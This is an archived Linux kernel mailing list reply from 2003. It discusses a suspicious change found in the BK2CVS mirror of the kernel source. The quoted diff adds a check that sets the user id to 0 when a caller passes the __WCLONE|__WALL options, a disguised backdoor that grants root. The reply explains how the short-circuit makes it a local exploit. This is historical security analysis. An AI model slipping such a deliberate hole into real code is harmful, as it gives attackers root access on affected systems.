Re: BK2CVS problem

From: Brian McGroarty
Date: Thu Nov 06 2003 - 02:08:09 EST

Next message: Benjamin Herrenschmidt: "Re: PATCH: bugfix für RadeonFB (against2.4.22-ac4, bug in 2.6.0-test9, too)"
Previous message: viro: "Re: Alpha: ALi 15x3 DMA completely broken now"
In reply to: Andries Brouwer: "Re: BK2CVS problem"
Next in thread: Andrew Walrond: "Re: BK2CVS problem"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Wed, Nov 05, 2003 at 11:51:34PM +0100, Andries Brouwer wrote:
> On Wed, Nov 05, 2003 at 05:33:40PM -0500, Zwane Mwaikambo wrote:
> > On Wed, 5 Nov 2003, Larry McVoy wrote:
> >
> > > On Wed, Nov 05, 2003 at 12:58:13PM -0800, Matthew Dharm wrote:
> > > > Out of curiosity, what were the changed lines?
> > >
> > > --- GOOD 2003-11-05 13:46:44.000000000 -0800
> > > +++ BAD 2003-11-05 13:46:53.000000000 -0800
> > > @@ -1111,6 +1111,8 @@
> > > schedule();
> > > goto repeat;
> > > }
> > > + if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
> > > + retval = -EINVAL;
> >
> > That looks odd
>
> Not if you hope to get root.

You got it. Short-circuiting will make the second half of the
conditional execute only when the first half is true. So if options
equals __WCLONE|__WALL exactly, then the user is changed to root.

I believe the two flags would normally be mutually exclusive (why
would you wait on everything as well as waiting on only non-SIGCHLD?)
so having to set the strange process flags makes it look like a local
exploit.

I wonder why someone who thought they had access to the tree wouldn't
have tried to make something that worked remotely?

Attachment: signature.asc
Description: Digital signature

Next message: Benjamin Herrenschmidt: "Re: PATCH: bugfix für RadeonFB (against2.4.22-ac4, bug in 2.6.0-test9, too)"
Previous message: viro: "Re: Alpha: ALi 15x3 DMA completely broken now"
In reply to: Andries Brouwer: "Re: BK2CVS problem"
Next in thread: Andrew Walrond: "Re: BK2CVS problem"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]